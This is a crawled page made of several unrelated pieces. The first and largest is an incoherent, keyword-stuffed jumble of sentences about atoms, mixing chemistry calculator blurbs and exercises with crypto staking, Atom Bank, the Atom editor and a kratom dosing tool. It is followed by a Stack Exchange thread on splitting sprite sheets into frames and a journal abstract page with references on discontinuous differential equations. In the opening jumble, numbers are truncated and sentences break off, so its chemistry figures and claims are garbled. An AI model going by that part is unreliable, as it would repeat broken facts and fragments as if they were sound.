Li; Beryllium Be; Carbon C; Nitrogen N; Oxygen O; Fluorine F; Sodium Na; Magnesium Mg; Aluminium Al; Silicon Si; Phosphorus P; Sulfur S; Chlorine Cl; Bromine Br; Iodine I; Increase charge of selected atom +1; Decrease charge of selected atom-1; Bonds. The mass of atoms is measured in terms of the atomic mass unit, which is defined to be 1 / 12 of the mass of an atom of carbon-12, or 1. ‎The atom calculator is a tool for calculating the atomic number and the mass number based on numbers of atom components - protons, neutrons, and electrons (or vice versa). Polyatomic Ion Calculator Introduction: the purpose of this calculator is to determine the scientific name of the ionic molecule entered. 21923857924346E-02 mol Percent composition (by mass): Element Count Atom Mass %(by mass). To calculate the mass of a single atom, first look up the atomic mass of carbon from the periodic table. This online calculator you can use for computing the average molecular weight (MW) of molecules by entering the chemical formulas (for example C3H4OH(COOH)3). 384959974 x 10^23 atoms occupy 1cm^3. This will help you with the solution of a wide variety of problems. Calculate value of an atom. Grams to Moles calculator. Infrared radiation is measured in microns, and microwave radiation in cm. Numerically, the measure is close to the known size of atoms. 2 NaCl → 2 Na + Cl 2 9) Calculate the atom economy to make hydrogen from the reaction of zinc with hydrochloric acid. You can delegate/bond your ATOM in a single click within Ledger or many other wallets. At GitHub, we're building the text editor we've always wanted: hackable to the core, but approachable on the first day without ever touching a config file. Calculate Electronegativity In chemistry, electronegativity is a measure of how strongly an atom attracts the electrons in a bond. In addition, you can define the charge of ions with known numbers of protons and electrons. 15 nm, calculate the number of carbon atoms which can be placed side by side in a straight line across a length of a scale of length 20 cm long. Assume the film (oleic acid non-polar region) is seventeen carbon atoms tall, and calculate the diameter of one carbon atom. One can calculate the energy levels for hydrogen easily. The effective nuclear charge on such an electron is given by the following equation: Zeff = Z − S. Enter the total number of atoms of a substance and the average atomic mass of the substance into the calculator. Question 38. density= mass/volume. The basic particles that make up an atom are electrons, protons, and neutrons. The Avogadro's number is a very important relationship to remember: 1 mole =$6. That means that a hydrogen atom has a volume of about 6. Here is a simple online oxidation number calculator to calculate the oxidation number of any compound or element by just clicking on the respective compound name in the given elements table with ease. Let us attempt to calculate its ground-state energy. saveCalculation (calculation, fileName) [source] ¶ Saves calculation for future use. Example: Determine the binding energy of the copper-63 atom. Z is the number of protons in the nucleus (atomic number). The ground state of an electron, the energy level it normally occupies, is the state of lowest energy for that electron. 18xx10^-18"Joules"# to remove the electron from n = 1 energy level to #n=oo#. Step 2: Locate the atom, molecule, or ion nearest the central metal atom. omnicalculator. plugin calculator math oracle popup apex dynamic-action Resources. Assume an energy for vacancy formation of 0. The first historical mention of the word atom came from works by the Greek philosopher Democritus, around 400 BC. If you were somehow able to change the proton number of this atom to 7, even if everything else remained the same, it would no longer be an oxygen atom, it would be nitrogen. Adding a proton to an atom makes a new element, while adding a neutron makes an isotope, or heavier version, of that atom. You can find metric conversion tables for SI units, as. We can however bypass it, if we are only interested in an estimate of the. 85 kg kmol-I. Enter search mode first, then enter parameters and click the "Calculate" button. Registered office: The Rivergreen Centre, Aykley Heads, Durham DH1 5TS. Atom Bank is a challenger bank which was publicly launched in 2016. Particle Interactions. How to Use the Atomic Mass Calculator?. It's a meta-counter that can count every thing you did with/without Atom, a hackable text editor for the 21st centery, with a fuckable counter. Turn off atom manipulation Off; Hydrogen H; Lithium Li; Beryllium Be; Carbon C; Nitrogen N; Oxygen O; Fluorine F; Sodium Na; Magnesium Mg; Aluminium Al; Silicon Si; Phosphorus P; Sulfur S; Chlorine Cl; Bromine Br; Iodine I; Increase charge of selected atom +1; Decrease charge of selected atom-1; Bonds. Thank You. Let us consider the case. 01, is the mass in grams of one mole of carbon. To use this online calculator for Atom percent to mass percent, enter Atomic percent of first element (X1), Atomic mass of first element (A1) and Atomic mass of second element (A2 and hit the calculate button. protons and neutrons are found in the nucleus. Numerically, the measure is close to the known size of atoms. The amount of samples to formulate the trends currently 799 across all fields as of 11/15/2018. import numpy x = 1 y = 1 y = 1 v = numpy. Then, follow these steps: Step 1. The anion, I-, is formed by adding an electron to the neutral iodine atom: I + e-I-Isotope Conversion: Changing the number of neutrons in the nucleus of an atom. Show your working clearly 3 [2a. ), a few sheets of paper, and a pencil. Compare live ATOM/AUD prices with over 2,500 currencies in real-time with historical charts and data pulled directly from top cryptocurrency exchanges. As stated in the problem, Qv = 0. Indicate the incorrect orbital designations: 1s 1p 2d 3s 4f 7f 3. Choose the First Element. In order to extend the life of your tool, use the lower value in the range. Atom - In this video tutorial, we will discuss topics such as the contents of atom, Geiger and Marsden Experiment, Primary shape of atom, impact parameter, etc. calculate formula/molecular mass; calculate mols for a specific substance; perform (terrifying) calculations involving mass-mol-# particles for several substances; Just to be clear, I am talking about counting the number of atoms present in a chemical formula without involving your calculator. The number of lone pairs on nitrogen atom = (v - b - c) / 2 = (5 - 3 - 0) / 2 = 1. To learn how to determine a bond order at a glance, keep reading!. For your material, The M= (Mass. Atomic theory stayed as a mostly philosophical subject, with not much actual scientific investigation or study, until the development of chemistry in the 1650s. The percent composition can be found by dividing the mass of each component by total mass. 5 mole of nitrogen atom is 7 g. Enter your sex, weight, the strain of the kratom you will be taking, and how frequently you dose, or plan to dose. 178 x 10^(-18) J) / (n^2 - n_0^2) were [delta] is the Greek letter delta used to represent change of E = Energy -2. You can then view an Element's: - Name - Symbol - Atomic Number - Atomic Mass (Weight) - Number of Protons, Neutrons and Electrons - Electron Shells + No In-App Purchases + No Permissions If there is anything you would like to see added, please comment your suggestion and I will. This helps you measure the return on investment (ROI) of Cosmos (ATOM*). ConvertUnits. Calculate the charge (+ or − and number) of this atom as pictured. Circle the most stable resonance structure. In mathematics, summation is the addition of a sequence of any kind of numbers, called addends or summands; the result is their sum or total. PART 2 - ATOM ECONOMY 8) Calculate the atom economy to make sodium from sodium chloride. This is written by using little numbers with + or - after the atom's letters. However TDP is only a specification of how. Calculate the radius of carbon atom if the length of this arrangement is 2. OK let's make that model. A hydrogen atom is made from a single proton that's circled by a single electron. Calculate the angular momentum of the electron according to Bohr's theory. Water has a partial negative charge ( ) near the oxygen atom due the unshared pairs of electrons, and partial positive charges ( ) near the hydrogen atoms. xls - hydrogen. In addition, learn about the definition of average or explore many other calculators. atom-calca package. 9% 4 2ACalculate the atom economy to form aluminium chloride from aluminium in this reaction. This is a somewhat detailed calculation requiring the usage of generalized Laguerre polynomials and spherical harmonics. The atomic number of an element, also called a proton number, tells you the number of protons or positive particles in an atom. Minus the number of electrons it owns. According to the Bohr model, the wavelength of the light emitted by a hydrogen atom when the electron falls from a high energy (n = 4) orbit into a lower energy (n = 2) orbit. Alpha Scattering by Charge Cloud. Here is how the Atomic Mass calculation can be explained with given input values -> 1. Due to the fact that electrons can transfer from one atom to another, every atom has the possibility of becoming negatively or positively charged. 44 g/mol (22. This Cosmos calculator projects potential rewards from the amount of ATOM delegated via stakefish. When you average out all of the masses, you get a number that is a little bit higher than 12 (the weight of a C-12 atom). If the atom has more electrons than protons, it is a negative ion, or ANION. Which statement must be true in order for this atom to have no net charge? There are three positively charged protons in the nucleus. As shown below this reaction has only 50% atom economy. The nucleus doesn't change in stable isotopes. Isotopes are atoms which have the same atomic number but different mass numbers. Atom XL Less. If you divide the charge (Q) of a particle or atom by it’s mass (m) then you will have found the specific charge in coulombs per kilogram (C kg-1). That means that a hydrogen atom has a volume of about 6. Chip loads are provided as ranges. The oxidation state is the atom's charge after ionic approximation of its bonds. To learn how to determine a bond order at a glance, keep reading!. guru to get an idea on the various math concepts and its calculators. The percent composition is used to describe the percentage of each element in a compound. Calculate (a) radius of zinc atom in pm and (b) number of atoms present in a length of 1. Assets such as ZIL offer an ROI of 16%, which fluctuates and is not locked at that rate. Atom economy = !!" x 100 = 4. The atom is the basic building block for all matter in the universe. Problem: What is the energy of an electron in the 푛=3 energy state of a hydrogen atom?. Give results in atomic units. Atomic number is very often symbolically represented as Z. Atom Calculator allows you to search for Elements of the Periodic Table using their Name, Symbol or Atomic Number. Atom counter Enter your formula to check the number of atoms. Polyatomic Ion Calculator Introduction: the purpose of this calculator is to determine the scientific name of the ionic molecule entered. Therefore, if an atom only has 6 electrons in its outer shell, it will try to gain 2 from another atom (which is what causes atoms to bond in various ways - either by. Enter search mode first, then enter parameters and click the "Calculate" button. Moles to Atoms Calculator Enter the total number of moles of a substance into the moles to atoms calculator. Technician A says that a vehicle may be considered non-drivable if the seat belt retractor is damaged from the collision. Atom XL Less. Another way to calculate atomic volume is to use the atomic or ionic radius of an atom (depending on whether or not you are dealing with an ion). The atom is the smallest particle of a chemical element that can exist. A = Mass Number or Atomic Weight; Calculation of relative atomic mass or weight of an element is made easier here. 02210 atoms/mol) 2 2 2 M N N Number Density Given Atom Fraction (Abundance) Oftentimes, it is necessary to compute the concentration of an individual isotope j given its fractional. Calculate the mass of an atom of (a) helium, (b) iron, and (c) lead. Active 5 months ago. 0221415 x 10 23 for Avogadro's number. You can delegate/bond your ATOM in a single click within Ledger or many other wallets. Atomic Mass "An atomic weight (relative atomic mass) of an element from a specified source is the ratio of the average mass per atom of the element to 1/12 of the mass of 12 C" in its nuclear and electronic ground state. molecular weight of carbon dioxide: number of carbon atoms (N) [email protected] distance © 2003, Professor John Blamire. We knew that for hydrogen atom, its energy eigenstates is given by Ψ á ß à where: Principal quantum number n = 1, 2, 3…. The Rutherford scattering experiment put to rest the Thomson model of the atom, because it could be shown that a positive charge distributed throughout the classical volume of the atom could not deflect the alpha particles by more than a small fraction of a degree. Though technically incorrect, the term is also often used to refer to the average atomic mass of all of the isotopes of one element. 02210 atoms/mol) 2 2 2 M N N Number Density Given Atom Fraction (Abundance) Oftentimes, it is necessary to compute the concentration of an individual isotope j given its fractional. How big is a hydrogen atom? The radius of a hydrogen atom is known as the Bohr Radius, which is equal to. The mass number allows enable us to tell the difference between elements with a different number of neutrons, called isotopes. now to find volume/atom = 1 / 3. "Atom bank", "Atom" and "Digital Mortgages by Atom bank" are trading names of Atom bank plc, a company registered in England and Wales with company number 08632552. UA-109208733-1 Live Cryptocurrency Conversion Calculator. Atom counter Enter your formula to check the number of atoms. ), a few sheets of paper, and a pencil. A sample of any element consists of one or more isotopes of that element. Calculate the total energy (J/mole) emitted when electrons of 1. SADIC samples the space around each atom of a given molecule evaluating the portion of volume that is external to any protein atom. Atomic number is very often symbolically represented as Z. Search radioactive activation products of elements and nuclides exposed to neutron radiation. How to calculate atomic number of an atom when wavelength is known? Ask Question Asked 5 years, 6 months ago. How to Use Grams to Atoms Calculator? The procedure to use the grams to atoms calculator is as follows: Step 1: Enter the atomic mass number, grams and x in the respective input field. The atomic radius of a chemical element is a measure of the size of its atoms, usually the mean or typical distance from the center of the nucleus to the boundary of the surrounding shells of electrons. The atom economy (atom utilisation) of a chemical reaction is a measure of the percentage of the starting materials that actually end up in useful products *. To find the binding energy, add the masses of the individual protons, neutrons, and electrons, subtract the mass of the atom, and convert that mass difference to energy. Divide the result by 2 to get the result. When you want to find where an electron is at any given time in a hydrogen atom, what you’re actually doing is finding how far the electron is from the proton. If an atom is what is called an "ion," then that means it has a different number of electrons than you’d expect. Calculate the Energy! Student Worksheet Neils Bohr numbered the energy levels (n) of hydrogen, with level 1 (n=1) being the ground state, level 2 being the first excited state, and so on. An atom can gain or lose electrons, becoming what is known as an ion. If an atom gains an electron then it has more electrons, which gives it a negative charge. A typical atom consists of a central, small, dense nucleus containing protons and neutrons. Calculate the potential energies of all the atoms. Diameter of one carbon atom = 7. This compute calculates a per-atom array with nlvalues columns, giving the Q l values for each atom, which are real numbers on the range 0 <= Q l <= 1. The energy of an excited hydrogen atom is -3. Atomic weight, also called relative atomic mass, ratio of the average mass of a chemical element's atoms to some standard. Nuclei with the same number of protons but different numbers of neutrons are. omnicalculator. How to calculate the number of protons, electrons, and neutrons in a neutral atom. This site uses an exact value of 6. 095 g/cm^3 = 8. of valence electrons in the concerned atom in free state (i. of σ-bonds + no. 1 The Atomic Models of Thomson and Rutherford Determining the structure of the atom was the next logical question to address following the discovery of the electron by J. You can see how Atom Bank performed in our latest mortgage satisfaction survey in the table below. So, as it is easily understandable when an atom has a high electronegativity, it will have more strength […]. 097x10 7 m-1. Compare live ATOM/AUD prices with over 2,500 currencies in real-time with historical charts and data pulled directly from top cryptocurrency exchanges. Interactive, free online calculator from GeoGebra: graph functions, plot data, drag sliders, create triangles, circles and much more!. Using the Bohr theory of the atom, calculate (a) the radius of the orbit, (b) the linear momentum of the electron, (c) the angular momentum of the electron, (d) the kinetic energy of the electron, (e) the potential energy of the system, and (f) the total energy of the system. A beautiful, free 4-Function Calculator from Desmos. Calculations can be performed on local files as well as remote files using http and ftp protocols. The negative indicates that on 'gain' of electron, #2. In this video, Suhani Ma’am is, well explained how to find a formal charge on any molecule or atom. A change in electrons can make an atom have a charge. Visible light wavelengths are usually expressed in nanometers (nm), and give photon energies that are given in electronvolts (eV) or kJ/mol. How to calculate the charge of an atom using the number of protons and electrons. 2500 BCA | Check the list of Bitcoin Atom mining pools, historical data, and available mining software and hardware. Calculate the energy for the transition of an electron from the n = 2 level to the n = 5 level of a hydrogen atom. This is written by using little numbers with + or - after the atom's letters. The molar mass of Na is 22. Price * Interest Rate * % Period (months. guru to get an idea on the various math concepts and its calculators. The 24h volume of [ATOM] is $308 728 681, while the Cosmos market cap is$4 655 850 136 which ranks it as #18 of all cryptocurrencies. When an atom is attracted to another atom because it has an unequal number of electrons and protons, the atom is called an ION. The goal is to add various kinds of exercises dealing with molecular formulae, monoisotopic mass and isotopic distribution. A carbon-12 atom has a mass of 12 u. Bohr noticed, however, that the quantum constant formulated by the German physicist Max Planck has dimensions which, when combined with the mass and charge of the electron, produce a measure of length. import numpy x = 1 y = 1 y = 1 v = numpy. and Canada. Then, follow these steps: Step 1. Assume an energy for vacancy formation of 0. 6 cm if the zinc atoms are arranged side by side lengthwise. You can buy ATOM with a credit card or exchange from another cryptocurrency within the wallet. An atom is the smallest form of matter that connote be divided without changing into something else. Answer (1 of 4): First you need to know the molecular formula for the molecule. An atom can have the following charges: positive, negative, or neutral, depending on the electron distribution. Click here👆to get an answer to your question ️ Calculate the oxidation number of sulphur atom in Na2SO4. 384959974 x 10^23 atoms/cm^3 = 2. Calculator Plugins User's Guide. The diameter of zinc atom is 2. ConvertUnits. Quickly convert atoms into moles using this online atoms to moles. This encouraged Bohr to use Planck's constant in searching for a theory of the atom. Therefore, if we make a proton the size of the picture above, 1000 pixels across, then the electron orbiting this proton is located 50,000,000 pixels to the right (but could be found anywhere in the sphere around the proton at that distance). Calculate the total energy (J/mole) emitted when electrons of 1. 022×10^23 atoms. Steps on How to Calculate Coordination Number? Step 1: Identify the central atom in the chemical formula. You can delegate/bond your ATOM in a single click within Ledger or many other wallets. 8 * 10^-23 grams (approximately). If no extra keywords are listed, then the potential energy is the sum of pair, bond, angle, dihedral,improper, kspace (long-range), and fix energy. Moles to Atoms Calculator Enter the total number of moles of a substance into the moles to atoms calculator. One mole of carbon is 6. The atomic number of an element, also called a proton number, tells you the number of protons or positive particles in an atom. If you want to reinvest your rewards, you have to manually claim them and delegate again. 1% ROI for staking. This web site provides a process to calculate economic return to N application with different nitrogen and corn prices and to find profitable N rates directly from recent N rate research data. This Cosmos calculator projects potential rewards from the amount of ATOM delegated via stakefish. Atom Calculator Application. This repl has no cover image. Q:-The mass of an electron is 9. "An atomic weight (relative atomic mass) of an element from a specified source is the ratio of the average mass per atom of the element to 1/12 of the mass of 12 C" in its nuclear and electronic ground state. it quite is adverse because of the fact artwork must be accomplished via the electron with the intention to flee the pull of the proton (gravitational analogy works right here). 99 g/mol + 35. Calculate the wavelength of light that corresponds to the transition of the electron from the n=4 to the n=2 state of the hydrogen atom. It's Spring cleaning time! Everything must go! Time to get some good deals people. It was already established the. Give your answers in kilograms. This is the atomic weight of gold. When an atom absorbs a photon, it jumps up to a higher level; the difference in energy of the two levels must be equal to the energy of the photon. 9994)]g/mol ( 5g/cm )(6. Technician A says that a vehicle may be considered non-drivable if the seat belt retractor is damaged from the collision. 0 g atom of hydrogen undergo traning giving the spectral line of lowest energy in the visible region of its atoms spectrum. 18xx10^-18"Joules"# to remove the electron from n = 1 energy level to #n=oo#. For example, there are three kinds of carbon atom 12C, 13C and 14C. The mass of 0. 1 × 10 –31 kg. This online calculator you can use for computing the average molecular weight (MW) of molecules by entering the chemical formulas (for example C3H4OH(COOH)3). Each atom has an integer number of neutrons, but the periodic table gives a decimal value because it is a weighted average of the number of neutrons in the isotopes of each element. By using this website, you agree to our Cookie Policy. It is sometimes useful to calculate the formal charge on each atom in a Lewis structure. How to calculate atomic number of an atom when wavelength is known? Ask Question Asked 5 years, 6 months ago. The operator of the kinetic energy in spherical coordinates for all s orbitals is: 1d2 2 d 2 dr + r d 1 dr. Answer (1 of 4): First you need to know the molecular formula for the molecule. Here's what you need:. (a) Calculate the fraction of atom sites that are vacant for copper (Cu) at its melting temperature of 1084°C (1357 K). This is an example of poor atom economy! continua nella prossima slide ; The percentage atom economy can be calculate by taking the ratio of the mass of the utilized atoms (137) to the total mass of the atoms of all the reactants (275) and multiplying by 100. Diamagnetic Materials create an induced magnetic field in a direction opposite to an externally applied magnetic field and are therefore repelled by the applied magnetic field. 7 : Calculate (1) the frequency and (2) the energy per quantum for electromagnetic radiation having a wavelength of 580 nm. Fe 2 O 3(s) + 3CO (g) ===> 2Fe (l) + 3CO 2(g) Using the atomic masses of Fe = 56, C = 12, O = 16, we can calculate the atom economy for extracting iron. This calculation is based on the idea of an atom as a sphere, which isn't precisely accurate. This online calculator you can use for computing the average molecular weight (MW) of molecules by entering the chemical formulas (for example C3H4OH(COOH)3). The 3 main subatomic particles that make up the atom are the proton, neutron and electron. If one of the atom is electronegative, it has more tendency to attract the electrons. The operator of the kinetic energy in spherical coordinates for all s orbitals is: 1d2 2 d 2 dr + r d 1 dr. How to Use Grams to Atoms Calculator? The procedure to use the grams to atoms calculator is as follows: Step 1: Enter the atomic mass number, grams and x in the respective input field. Begin: Step: » Moles Conversions: mol↔mmol 1 mol = 1000 mmol mol↔umol 1 mol = 1000000 umol mol↔nmol. Particle Interactions. Lets use water, H2O. alkali_atom_functions. Another way to calculate atomic volume is to use the atomic or ionic radius of an atom (depending on whether or not you are dealing with an ion). 024xx10^23)~~34. Minimum Down Payment is 60%. Atom Power Calculator - Скачать бесплатно последнюю версию, без СМС | Получите новейшие версии ваших программ. The mass and atomic fraction is the ratio of one element's mass or atom to the total mass or atom of the mixture. get_potential_energy (force_consistent = False, apply_constraint = True) [source] ¶ Calculate potential energy. 3 mol Na × (6. There are three positively charged protons outside the nucleus. Calculate the wavelength of the electron in the 5th orbit. For the general chemical reaction:. The central atom may only be bonded to one other element. 2 × 10-31 cubic meters. com tracks the staking yield, proof-of-stake metrics, blockchain data and everything useful to earn passive returns by delegating Cosmos (ATOM). Remember to use uppercase and lowercase on the name of athoms appropriately! Example: Mg {OH}2 (magnesium hydroxide) has one atom of magnesium, two atoms of oxygen and two atoms of hydrogen. Therefore, if we make a proton the size of the picture above, 1000 pixels across, then the electron orbiting this proton is located 50,000,000 pixels to the right (but could be found anywhere in the sphere around the proton at that distance). 34 10 atoms/cm [238. The number of electrons in a neutral atom is equal to the number of protons.
2021-04-12 22:24:07
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.519125759601593, "perplexity": 1014.8932781256763}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038069267.22/warc/CC-MAIN-20210412210312-20210413000312-00283.warc.gz"}
https://gamedev.stackexchange.com/questions/34055/how-can-i-unpack-a-sprite-sheet-into-multiple-images/66508
# How can I unpack a sprite sheet into multiple images? [closed] I need to take a sprite sheet and convert it into multiple images, one for each frame of the sprite sheet. How should I go about this? I would prefer an offline method or a tool to do so -- I found Alferd SpriteSheet Unpacker, but it is really slow on Windows 7 and does not seem to respond well at all. • I reworded your question so it is asking how to solve (what I presume to be) your specific problem rather than asking for a list of tools others are using, as the latter type of question is a poor fit for this site. – user1430 Aug 11 '12 at 18:54 • I'm the author of 'Alferd Spritesheet Unpacker' can you post a link to the spritesheet you're trying to unpack and I'll see why it's so slow. I developed and tested it on Windows 7 so that shouldn't be an issue. – ForkandBeard Aug 12 '12 at 8:29 • @ForkandBeard Here is the spritesheet. i.imgur.com/R1MPY.png . When I click on Select All > Export Selected. Nothing seems to happen it just hangs, and I tried sleeping on it but no luck. – Aivan Monceller Aug 12 '12 at 9:01 • @AivanMonceller thanks for posting the spritesheet. It's really small, I managed to unpack it in under a second running on Windows 7. I can't replicate the issue all I can suggest is make sure you're using ASU version 8 and you have permission to write to the folder you're trying to export to... – ForkandBeard Aug 12 '12 at 9:25 • If you don't mind an online solution, imagesplitter.net is as easy as it gets (provided the spritesheet is actually a regular grid, like the one you've posted). Just upload your image, select SPLIT IMAGE tab, choose the number of rows and columns (and the images format) - and that's pretty much it. – JustACluelessNewbie May 9 '14 at 8:02 I just can't replicate the issue with FolderBrowserDialog.ShowDialog hanging, so I've created a new version of the app (version 9) which has a new 'Prompt for Export Folder' option. Unchecking this option removes the need for the dialog box. You can download version 9 from my site Alferd Spritesheet Unpacker version 9. On the 'Options' form untick the 'Prompt for Export Folder' check box and now ASU will just export the files to whatever directory path is in the long textbox at the bottom of the main form. (If you don't want to change this option every-time you can set PromptForDestinationFolder to false in the .exe.config file) • Unfortunately, even with the PromtpForDestinationFolder unchecked, it still hangs. I am testing with this spritesheet (note that I converted it to PNG before dragging it into your unpacker): funorb.com/img/images/game/central/dev_diary/… – Samaursa Jun 29 '13 at 21:20 • It also hangs when I click about... in options. I am guessing the program has trouble opening additional windows. – Samaursa Jun 29 '13 at 21:22 • @ForkandBeard. FYI, I think I experienced this issue on Windows 10, but I was able to work around it by clicking Alt+Tab. Apparently, the "Select Folder" dialog was showing up, but did not steal focus from the main window. And, since the main window was waiting for the dialog, it seemed "frozen." – jpaugh Mar 31 at 21:04 Shoebox is a great tool for this purpose and rather flexible. http://renderhjs.net/shoebox/extractSprites.htm It's AIR based, so you can use it on OSX or Windows. It's drag/drop automagic at it's best.
2019-12-14 09:36:45
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2561033070087433, "perplexity": 1809.8395658841066}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540585566.60/warc/CC-MAIN-20191214070158-20191214094158-00113.warc.gz"}
https://www.aimsciences.org/article/doi/10.3934/dcds.2015.35.4415
Article Contents Article Contents # Stratified discontinuous differential equations and sufficient conditions for robustness • This paper is concerned with state-constrained discontinuous ordinary differential equations for which the corresponding vector field has a set of singularities that forms a stratification of the state domain. Existence of solutions and robustness with respect to external perturbations of the righthand term are investigated. Moreover, notions of regularity for stratifications are discussed. Mathematics Subject Classification: Primary: 34A12, 34A36; Secondary: 34D10. Citation: • [1] J.-P. Aubin and A. Cellina, Differential Inclusions: Set-Valued Maps and Viability Theory, Springer-Verlag New York, Inc., 1984.doi: 10.1007/978-3-642-69512-4. [2] R. C. Barnard and P. R. Wolenski, Flow invariance on stratified domains, Set-Valued and Variational Analysis, 21 (2013), 377-403.doi: 10.1007/s11228-013-0230-y. [3] U. Boscain and B. Piccoli, Optimal Syntheses for Control Systems on 2-D Manifolds, vol. 43, Springer, 2004. [4] A. Bressan and Y. Hong, Optimal control problems on stratified domains, Network and Heterogeneous Media, 2 (2007), 313-331.doi: 10.3934/nhm.2007.2.313. [5] P. Brunovskỳ, The closed-loop time-optimal control. I: Optimality, SIAM Journal on Control, 12 (1974), 624-634.doi: 10.1137/0312046. [6] P. Brunovskỳ, The closed-loop time optimal control. II: Stability, SIAM Journal on Control and Optimization, 14 (1976), 156-162.doi: 10.1137/0314013. [7] P. Brunovskỳ, Every normal linear system has a regular time-optimal synthesis, Mathematica Slovaca, 28 (1978), 81-100. [8] P. Brunovskỳ, Regular synthesis for the linear-quadratic optimal control problem with linear control constraints, J. Differential Equations, 38 (1980), 344-360.doi: 10.1016/0022-0396(80)90012-1. [9] F. Clarke, Discontinuous feedback and nonlinear systems, in 8th IFAC Symposium on Nonlinear Control Systems, (2010), 1-29. [10] F. Clarke, Y. Ledyaev, R. Stern and P. Wolenski, Nonsmooth Analysis and Control Theory, vol. 178, Springer, 1998. [11] A. F. Filippov and F. M. Arscott, Differential Equations with Discontinuous Righthand Sides: Control Systems, vol. 18, Springer, 1988.doi: 10.1007/978-94-015-7793-9. [12] O. Hájek, Terminal manifolds and switching locus, Mathematical systems theory, 6 (1972), 289-301.doi: 10.1007/BF01740720. [13] O. Hájek, Discontinuous differential equations, I, J. Differential Equations, 32 (1979), 149-170.doi: 10.1016/0022-0396(79)90056-1. [14] O. Hájek, Discontinuous differential equations, II, J. Differential Equations, 32 (1979), 171-185, 171-185. [15] C. Hermosilla and H. Zidani, Infinite horizon problem on stratifiable state-constraints set, J. Differential Equations, 258 (2015), 1430-1460.doi: 10.1016/j.jde.2014.11.001. [16] S. Honkapohja and T. Ito, Stability with regime switching, Journal of Economic Theory, 29 (1983), 22-48.doi: 10.1016/0022-0531(83)90121-7. [17] M. R. Jeffrey and A. Colombo, The two-fold singularity of discontinuous vector fields, SIAM Journal on Applied Dynamical Systems, 8 (2009), 624-640.doi: 10.1137/08073113X. [18] V. Y. Kaloshin, A geometric proof of the existence of whitney stratifications, Mosc. Math. J, 5 (2005), 125-133. [19] A. Marigo and B. Piccoli, Regular syntheses and solutions to discontinuous odes, ESAIM: Control, Optimisation and Calculus of Variations, 7 (2002), 291-307.doi: 10.1051/cocv:2002013. [20] J. Mather, Notes on topological stability, Bull. Amer. Math. Soc., 49 (2012), 475-506.doi: 10.1090/S0273-0979-2012-01383-6. [21] L. D. Meeker, Local time-optimal feedback control of strictly normal two-input linear systems, SIAM journal on control and optimization, 27 (1989), 53-82.doi: 10.1137/0327005. [22] Z. Rao and H. Zidani, Hamilton-jacobi-bellman equations on multi-domains, in Control and Optimization with PDE Constraints, Springer, 164 (2013), 93-116.doi: 10.1007/978-3-0348-0631-2_6. [23] E. D. Sontag, Mathematical Control Theory: Deterministic Finite Dimensional Systems, vol. 6, Springer, 1998.doi: 10.1007/978-1-4612-0577-7. [24] H. Sussmann, Regular synthesis for time-optimal control of single-input real analytic systems in the plane, SIAM journal on control and optimization, 25 (1987), 1145-1162.doi: 10.1137/0325062. [25] M. A. Teixeira, Stability conditions for discontinuous vector fields, J. Differential Equations, 88 (1990), 15-29.doi: 10.1016/0022-0396(90)90106-Y. [26] L. Van den Dries and C. Miller, Geometric categories and o-minimal structures, Duke Mathematical Journal, 84 (1996), 497-540.doi: 10.1215/S0012-7094-96-08416-1.
2022-11-29 20:34:13
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 1, "x-ck12": 0, "texerror": 0, "math_score": 0.7458863854408264, "perplexity": 3010.2129395063002}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-49/segments/1669446710711.7/warc/CC-MAIN-20221129200438-20221129230438-00357.warc.gz"}
https://forum.wilmott.com/viewtopic.php?t=79451&start=60
